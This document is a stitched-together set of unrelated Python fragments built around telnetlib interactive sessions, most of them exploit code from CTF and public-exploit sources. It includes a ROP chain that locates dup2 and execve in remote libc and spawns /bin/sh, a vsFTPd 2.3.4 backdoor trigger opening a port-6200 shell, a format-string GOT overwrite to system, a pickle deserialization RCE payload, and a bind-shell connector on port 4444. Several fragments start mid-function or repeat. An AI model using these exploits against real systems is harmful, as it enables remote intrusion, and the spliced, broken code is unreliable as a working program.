            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(SERVER)
            s.recv(4096)  # server hello
            s.send(payload)

            page_data = s.recv(page_size)
            if len(page_data) == 0:
                break

            if dup2_start in page_data:
                dup2_remote_addr = libc_page + page_data.index(dup2_start)
                print "Found dup2 @ {}".format(hex(dup2_remote_addr))

            if execve_start in page_data:
                execve_remote_addr = libc_page + page_data.index(execve_start)
                print "Found execve @ {}".format(hex(execve_remote_addr))

            s.close()
            libc_page += page_size  # scan up
        except EOFError:
            break

    print "libc scan over"
    text_section_close_plt = text_section_base + 0x960

    # Final payload for remote shell
    payload = "davide" + "AA"  # address of that is buffer_start_addr

    # close(0)
    payload += p64(gadget_pop_rdi_ret ^ Ds)  # first, we ret here <---- (
    payload += p64(0x0 ^ Ds)  # pop this to RDI
    payload += p64(text_section_close_plt ^ Ds)  # ret there

    # close(1)
    payload += p64(gadget_pop_rdi_ret ^ Ds)  # return from above to here
    payload += p64(0x1 ^ Ds)  # pop this to RDI
    payload += p64(text_section_close_plt ^ Ds)  # ret there

    # dup2(4,0)
    payload += p64(gadget_pop_rdi_ret ^ Ds)  # return from above to here
    payload += p64(0x4 ^ Ds)  # pop this to RDI (socket's FD)
    payload += p64(gadget_pop_rsi_pop_r15_ret ^ Ds)  # ret to this gadget
    payload += p64(0x0 ^ Ds)  # pop rsi
    payload += p64(0xdeadbeefdeadbeef)  # pop r15 (dont care)
    payload += p64(dup2_remote_addr ^ Ds)  # call dup2

    # dup2(4,1)
    payload += p64(gadget_pop_rdi_ret ^ Ds)  # return from above to here
    payload += p64(0x4 ^ Ds)  # pop this to RDI (socket's FD)
    payload += p64(gadget_pop_rsi_pop_r15_ret ^ Ds)  # ret to this gadget
    payload += p64(0x1 ^ Ds)  # pop rsi
    payload += p64(0xdeadbeefdeadbeef)  # pop r15 (dont care)
    payload += p64(dup2_remote_addr ^ Ds)  # call dup2

    # When back from dup2, load arguments for execve
    payload += p64(gadget_pop_rdi_ret ^ Ds)

    stack_bin_sh = buffer_addr + 224  # will be placed in a few line from now
    payload += p64(stack_bin_sh ^ Ds)

    # Second argument for execve = NULL
    payload += p64(gadget_pop_rdx_ret ^ Ds)
    payload += p64(0x0 ^ Ds)

    # Third argument for execve = NULL
    payload += p64(gadget_pop_rsi_pop_r15_ret ^ Ds)
    payload += p64(0x0 ^ Ds)
    payload += p64(0xdeadbeefdeadbeef ^ Ds)

    # jump to execve
    # (gadget_pop_rdx_ret + 1 skips the pop and is a bare `ret`, i.e. a
    # stack-alignment nop before the execve stub)
    payload += p64((gadget_pop_rdx_ret + 1) ^ Ds)
    payload += p64(execve_remote_addr ^ Ds)

    # place /bin/sh on the stack
    payload += "".join([chr(ord(t) ^ 0xd) for t in "/bin/sh"])
    payload += chr(0x0 ^ 0xd)  # terminating null

    # Pad to the end of buffer
    payload += "B" * (1032 - len(payload))
    payload += p64(canary ^ Ds)
    payload += p64(buffer_addr ^ Ds)
    payload += p64(text_section_leave_ret ^ Ds)

    sock = socket.socket()
    sock.connect(SERVER)
    sock.recv(4096)  # server hello
    sock.send(payload)
    #interactive mode
    t = Telnet()
    t.sock = sock
    print "Starting interactive session:"
    t.interact()
    sock.close()
def interact():
    """Announce and run a Telnet ``interact()`` loop over the module-level ``r``.

    Python 2 print statement; the socket is not closed here.
    """
    print "INTERACTIVE"
    session = Telnet()
    session.sock = r
    session.interact()

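def handler(signal_received, frame):
    """SIGINT handler: print a farewell and terminate with status 0.

    Uses ``sys.exit`` rather than the ``site``-provided ``exit`` builtin,
    which is meant for the interactive prompt and is absent under
    ``python -S``.  Both parameters are the ones ``signal.signal`` passes and
    are unused.
    """
    import sys
    print('   [+]Exiting...')
    sys.exit(0)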


signal(SIGINT, handler)
parser = argparse.ArgumentParser()
parser.add_argument("host",
                    help="input the address of the vulnerable host",
                    type=str)
args = parser.parse_args()
host = args.host
portFTP = 21  #if necessary edit this line

# Credentials are redacted in this copy of the script.
user = "******"
password = "******"


def _send_line(session, text):
    # Telnet.write() wants bytes; the protocol lines here are ASCII.
    session.write(text.encode('ascii') + b"\n")


# Stage 1: log in over the FTP control channel.  read_until() has no
# timeout, so a different banner or prompt text blocks here forever.
tn = Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)")  #if necessary, edit this line
_send_line(tn, user)
tn.read_until(b"password.")  #if necessary, edit this line
_send_line(tn, password)

# Stage 2: the backdoor listens on TCP 6200; hand that connection to the
# user.  Telnet() raises if it cannot connect, so the success message is
# only printed once the second connection is up.
tn2 = Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
conn = Telnet('3.239.213.227', 27491)

mt = MT19937()

# Phase 1: feed the predictor.  Each '10' answer makes the service reply one
# integer per line; only its low bit is known to us, the other 31 bits go in
# as None.  Stop as soon as the reconstructor reports nothing remaining.
remain = None
bar = trange(40)
for i in bar:
    conn.write(b'10\n' * 500)
    for _ in range(500):
        value = int(conn.read_until(b'\n').decode())
        lsb_bits = tobin(value & 1)[:1] + [None] * 31
        for bit in lsb_bits:
            remain = mt.add(bit)
        bar.desc = f'[o] Reconstruct - {remain} remain'
    if remain == 0:
        rec = mt.reconstruct('python')
        break
bar.close()

# Phase 2: answer 1337 rounds with the predicted digits, 100 per batch.
# The bare assert is a protocol check and disappears under `python -O`.
bar = trange(1337)
for i in range(0, 1337, 100):
    n = min(1337 - i, 100)
    m = ''.join(f'{rec.getrandbits(32) % 10}\n' for _ in range(n))
    conn.write(m.encode())
    for _ in range(n):
        res = conn.read_until(b'\n').decode().strip()
        assert res == '.', res
    bar.update(n)

conn.interact()
from telnetlib import Telnet

# Interactive Telnet session to 80.0.0.3:5024 (cleartext).  interact()
# returns None once the session ends, so the print just emits "None".
CN = Telnet('80.0.0.3', 5024)
result = CN.interact()
print result
 def kvm_console(self, options):
     """Open an interactive Telnet session to this VM's KVM serial console.

     The endpoint is the hypervisor's first IP (``get_ips()[0]``) and the port
     stored under the ``kvm``/``console`` attribute.  ``options`` is accepted
     for interface compatibility and not used here.  The console is reached
     over plain Telnet, so the traffic is unencrypted.
     """
     host = self.get_hypervisor().get_ips()[0]
     port = self.attr_value(key="kvm", subkey="console")
     Telnet(host, port).interact()
    0x75,
    0xa8,
    0x8a,
    0x4e,
    0x95,
    0xda,
    0xae,
    0xd0,
    0x1d,
    0x59,
    0xa5,
    0xcb,
    0xef,
    0x76,
    0x29,
],
                 dtype=np.uint8).reshape(4, 4)

print(states.shape)
# Use the first candidate whose first column equals `first`: XOR it with
# `magic`, send the 16 bytes base64-encoded (newlines stripped) and hand the
# connection to the user.  exit(0) ends the script right there, so later
# candidates are never considered.
for candidate in states:
    if not (candidate[:, 0] == first).all():
        continue
    masked = candidate ^ magic
    print(masked)
    raw = masked.tobytes()
    assert (len(raw) == 16)
    encoded = codecs.encode(raw, 'base64').replace(b'\n', b'')
    print(encoded)
    remote.write(encoded + b'\n')
    remote.interact()
    exit(0)
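def main():
    """Play the five game stages, leak addresses via format strings, pop a shell.

    Talks to ``HOST:PORT`` (module globals) over ``telnetlib``.  The game
    phase (``game(tn)``) is restarted from scratch on any failure.  Then the
    fixed TARDIS key and a sequence of menu writes (the original labels this
    "wait for alarm") lead to the coordinates input, where two format-string
    reads leak the binary base (``%N$p``) and ``setsockopt@GOT`` (``%21$s``)
    to derive ``system`` in libc from hard-coded offsets.  A ``FormatStr``
    write then redirects ``strchr@GOT`` to ``system`` so that the next input,
    ``/bin/sh``, is executed, and the session goes interactive.

    Changes: the retry loop catches ``Exception`` instead of everything --
    the bare ``except`` also swallowed ``KeyboardInterrupt`` and made the
    loop impossible to abort -- and the old connection is closed explicitly
    before reconnecting instead of relying on ``del``.  Offsets are for one
    specific libc/binary build.  NOTE(review): ``struct.pack('L', ...)`` uses
    the native size (8 bytes on 64-bit Linux) while the leaked addresses are
    32-bit; confirm this is the intended width.
    """
    coordinates =  '51.492137,-0.192878 '
    libc_setsockopt_offset = 0xea8e0
    libc_system_offset = 0x3af40
    libc_binsh_offset = 0x15ef08
    strchr_got_offset = 0x505c
    
    tn  = Telnet(HOST, PORT)
    stage = 0
    while stage < 5:
        try:
            game(tn)
            stage += 1
        except Exception:
            # Any protocol hiccup: drop the connection and start over.
            tn.close()
            tn  = Telnet(HOST, PORT)
            stage = 0

    
    tn.read_until(b'TARDIS KEY: ')
    tn.write(b'UeSlhCAGEp\n')
    tn.read_until(b'Selection: ')
    tn.write(b'11111111\x00')

    print('wait for alarm')
    time.sleep(3)

    tn.write(struct.pack('L', 1431907181))
    tn.write(b'11111111\xff')
    tn.write(b'1\n')
    
    
    tn.read_until(b'Selection: ')
    tn.write(b'3\n')
    
    tn.read_until(b'Coordinates: ')
    tn.write(coordinates.encode())
    # Stack offset of the return address slot, in 4-byte words, as %N$p
    tn.write('zzz%{}$p\n'.format(int((0xff8ce05c-0xff8cdc0c)/4-1)).encode())
    tn.read_until(b'zzz')
    
    base_addr = int(tn.read_some()[0:10].decode(), 16) - 0x1491
    print('base addr : {}'.format(hex(base_addr)))
    
    tn.read_until(b'Coordinates: ')

    # Arbitrary read: place the GOT address on the stack, dereference with %21$s
    tn.write(coordinates.encode())
    tn.write(b'zzzz')
    tn.write(struct.pack('<I', base_addr+0x500c)) 
    tn.write(b'%21$s\n')
    tn.read_until(b'zzzz')
    setsockopt_addr = struct.unpack('<I', tn.read_some()[4:8])[0]
    print('setsockopt :{}'.format(hex(setsockopt_addr)))

    libc_system = setsockopt_addr - (libc_setsockopt_offset - libc_system_offset)
    libc_binsh = setsockopt_addr - (libc_setsockopt_offset - libc_binsh_offset)

    print('system :{}'.format(hex(libc_system)))

    strchr_got = base_addr + strchr_got_offset

    print('strchr_got :{}'.format(hex(strchr_got)))

    # Arbitrary write: strchr@GOT -> system (adjusted by the same constant
    # the original used; build-specific).
    p = FormatStr()
    p[strchr_got] = libc_system - 0x14 - 0x140000

    tn.write(coordinates.encode())
    tn.write(p.payload(20) + b'\n')

    tn.read_until(b'Coordinates: ')
    tn.read_until(b'Coordinates: ')
    tn.write(b'/bin/sh\n')
    tn.interact()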
		try:
			skt.connect((self.host, 4444))
		except socket.error, err:
			print "[-] Error: %s" % err[1]
			print "[-] Explotation failed\n[-] Daemon should be dead..."
			return None
		print "[+] Connected to shell at %s on port %d" % (self.host, 4444)
		res = skt.recv(1024)
		if res:
			if res.count('Microsoft Windows'):
				print "[+] Welcome my lord, i'm here to serve you ;) ...\n"
				from telnetlib import Telnet
				telnet = Telnet()
				telnet.sock = skt
				try:
					telnet.interact()
				except:
					pass
				skt.close()
				print "[-] Bye..bye I hope you've enjoyed your stay.. ;)"
				return None
		skt.close()
		print '[-] Explotation failed\nDaemon should be dead...'

if __name__ == '__main__':
	if len(sys.argv) != 3:
		print "*************************************"
		print "* Coded by Sergio 'shadown' Alvarez *"
		print "*          [email protected]        *"
		print "*************************************"
		print "Usage: %s host port" % sys.argv[0]
def interacc():
    """Announce and run a Telnet ``interact()`` loop over the module-level ``proc``.

    Python 2 print statement; ``proc`` must be a connected socket-like object.
    """
    print "INTERACTIVE"
    session = Telnet()
    session.sock = proc
    session.interact()
sock.send(flag)
sock.send(op)

# Dump up to OUTPUT_SIZE bytes of the reply as hex, 8 per row, and assemble
# the little-endian qword at offsets 24..31 -- that is the leaked libc
# pointer.  An empty recv() means the peer closed; stop early.  Python 2.
libc_pointer = 0
import sys
for i in xrange(0, OUTPUT_SIZE):
  c = sock.recv(1)
  if not c:
    sys.stdout.write('\n')
    break
  value = ord(c)
  sys.stdout.write('%02x ' % value)
  if i % 8 == 7:
    sys.stdout.write('\n')
  sys.stdout.flush()
  if 24 <= i < 32:  # bytes 24..31 hold the libc pointer
    libc_pointer |= value << (8 * (i - 24))

from time import sleep
sleep(1)
libc_pointer += 5518181  # offset to magic gadget (build-specific)
# 32 copies of a fixed text address followed by the gadget address
sock.send(pack('<Q', 0x0000000000400be9) * 32)
sock.send(pack('<Q', libc_pointer))

from telnetlib import Telnet
t = Telnet()
t.sock = sock
print "take the wheel"
t.interact()
 def kvm_console(self, options):
     """Open an interactive Telnet session to this VM's KVM serial console.

     The endpoint is the hypervisor's first IP (``get_ips()[0]``) and the port
     stored under the ``kvm``/``console`` attribute.  ``options`` is accepted
     for interface compatibility and not used here.  The console is reached
     over plain Telnet, so the traffic is unencrypted.
     """
     host = self.get_hypervisor().get_ips()[0]
     port = self.attr_value(key='kvm', subkey='console')
     Telnet(host, port).interact()
# -- continuation of a hand-built pickle opcode stream; `p` and memo[0]
# (sys.modules, per the comments below) are set up earlier in the file.
# The stream reaches os.system through sys.modules and calls it with the
# command bytes; the server side evidently unpickles untrusted input.
p += b'q\x01'  # memo[1] = 'sys'

p += b'h\x00h\x01h\x00s'  # sys.modules['sys'] = sys.modules

p += b'csys\nget\n'  # sys.modules.get
p += b'X\x02\x00\x00\x00os\x85'  # push ('os',)
p += b'R'  # push sys.modules.get('os')
p += b'q\x02'  # memo[2] = os

p += b'h\x00h\x01h\x02s'  # sys.modules['sys'] = os
p += b'csys\nsystem\n'  # push os.system

# Shell command run on the target.
payload = b'cat ../flag.txt'

# BINUNICODE: 'X' + little-endian 32-bit length + the bytes themselves
p += b'X'
p += struct.pack('<I', len(payload))
p += payload
p += b'\x85'  # push (payload,) -- one-element tuple for the call
p += b'R'  # RCE!!!!!!!
p += b'.'  # STOP

# Base64 on one line so it can be sent as a single input line.
p = codecs.encode(p, 'base64')
p = p.replace(b'\n', b'')

# r = Telnet('localhost', 5421)
# r = Telnet('18.232.184.48', 5421)
r = Telnet('pysh1.balsnctf.com', 5421)
r.write(p + b'\n')
r.interact()
    def _post_run(self):
        """List the repository's remote debug sessions and, in debug mode, attach.

        Walks ``self.command.result.hook_files`` and their
        ``remote_debug_sessions``, building one row per session (ID, hook,
        PID, host, port, state, connected peer or '-').  A session in the
        'listening' state is remembered in ``listening`` and, outside debug
        mode, its state is shown with a ``*`` suffix.  With no sessions at
        all a message is written to stdout and the method returns.  Otherwise
        the table is rendered with ``render_text_table``; outside debug mode
        the footer tells the user how to attach.

        In debug mode (``self._debug_``) with exactly one listening session,
        an interactive ``telnetlib.Telnet`` session is opened to that
        session's host/port.  Security: nothing here authenticates the
        endpoint, so presumably anything that can reach that host/port can
        attach the same way -- the listener should be bound to loopback or
        otherwise restricted (TODO confirm where it is bound).

        Python 2 (``i.next()``).
        """
        r = self.command.result

        i = count()
        rows = list()
        listening = list()
        for h in r.hook_files:
            sessions = h.remote_debug_sessions
            if not sessions:
                continue

            for s in sessions:
                state = s.state
                is_listening = False
                if state == 'listening':
                    is_listening = True
                    if not self._debug_:
                        # '*' refers the reader to the footer hint below
                        state = state + '*'

                row = [ i.next(), s.hook_name, s.pid, s.host, s.port, state ]

                if s.state == 'connected':
                    row.append('%s:%d' % (s.dst_host, s.dst_port))
                else:
                    row.append('-')

                rows.append(row)

                if is_listening:
                    listening.append(row)

        if not rows:
            m = "No remote debug sessions found for repository '%s'.\n"
            sys.stdout.write(m % r.name)
            return

        header = ('ID', 'Hook', 'PID', 'Host', 'Port', 'State', 'Connected')
        rows.insert(0, header)

        k = Dict()
        k.banner = (
            "Remote Debug Sessions for Repository '%s'" % r.name,
            "(%s)" % r.path,
        )
        if not self._debug_:
            if len(listening) == 1:
                k.footer = (
                    "(*) type 'evnadmin debug %s' "
                    "to debug this session" % self.command.name
                )
            elif len(listening) > 1:
                # Ugh, this is highly unlikely and I can't think of a good way
                # to handle it at the moment.
                k.footer = '(*) multiple listeners?!'

        # First column right-justified, all others centred
        k.formats = lambda: chain((str.rjust,), repeat(str.center))
        k.output = sys.stdout
        #k.special = '='
        render_text_table(rows, **k)

        if not self._debug_:
            return

        if len(listening) != 1:
            return

        # Attach to the single listening session (row layout: host at index
        # 3, port at index 4).
        from telnetlib import Telnet
        listen = listening[0]
        host = listen[3]
        port = listen[4]
        t = Telnet(host, port)
        t.interact()
def interact(s):
    """Announce and run a Telnet ``interact()`` loop over the connected socket ``s``.

    The socket is not closed here; the caller keeps ownership of ``s``.
    """
    print("[*] connect to remote")
    session = Telnet()
    session.sock = s
    session.interact()
def interact(s):
    """Announce and run a Telnet ``interact()`` loop over the connected socket ``s``.

    The socket is not closed here; the caller keeps ownership of ``s``.
    """
    print("[*] interactive mode")
    session = Telnet()
    session.sock = s
    session.interact()
        try:
            skt.connect((self.host, 4444))
        except socket.error, err:
            print "[-] Error: %s" % err[1]
            print "[-] Explotation failed\n[-] Daemon should be dead..."
            return None
        print "[+] Connected to shell at %s on port %d" % (self.host, 4444)
        res = skt.recv(1024)
        if res:
            if res.count('Microsoft Windows'):
                print "[+] Welcome my lord, i'm here to serve you ;) ...\n"
                from telnetlib import Telnet
                telnet = Telnet()
                telnet.sock = skt
                try:
                    telnet.interact()
                except:
                    pass
                skt.close()
                print "[-] Bye..bye I hope you've enjoyed your stay.. ;)"
                return None
        skt.close()
        print '[-] Explotation failed\nDaemon should be dead...'


if __name__ == '__main__':
    if len(sys.argv) != 3:
        print "*************************************"
        print "* Coded by Sergio 'shadown' Alvarez *"
        print "*          [email protected]        *"
        print "*************************************"
def shell():
    """Connect to ``HOST:S_PORT`` (module globals) over Telnet and hand the
    session to the user.  Cleartext; the connection is not closed explicitly.
    """
    Telnet(HOST, S_PORT).interact()